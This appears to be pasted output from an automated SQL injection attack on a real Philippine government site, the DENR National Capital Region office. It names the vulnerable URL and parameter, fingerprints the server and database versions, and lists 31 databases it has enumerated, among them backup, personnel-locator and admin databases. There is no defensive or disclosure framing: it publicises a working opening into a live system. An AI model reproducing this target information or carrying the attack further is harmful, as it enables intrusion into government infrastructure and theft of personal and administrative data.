.gov Government

.ph Philippines

Republic Of The Philippines

Department Of Environment And Natural Resources

Department of Health and Natural Resources

National Capital Region

https://ncr.denr.gov.ph/index.php?id=346

the back-end DBMS is MySQL
web application technology: Nginx, PHP 7.3.12
the back-end DBMS: MySQL >= 5.6
banner: '8.0.18'

available databases [31]:
[*] backup_r4a
[*] car
[*] databank
[*] denr_epes
[*] denr_feedback
[*] denr_isd_monitoring_toolkit
[*] edwp
[*] idwp
[*] infores
[*] information_schema
[*] mysql
[*] ncr
[*] performance_schema
[*] personnellocator
[*] r1
[*] r10
[*] r11
[*] r12
[*] r13
[*] r2
[*] r3
[*] r4a
[*] r4b
[*] r5
[*] r6
[*] r7
[*] r8
[*] r9
[*] regionadmin
[*] sys
[*] zadmin_intl
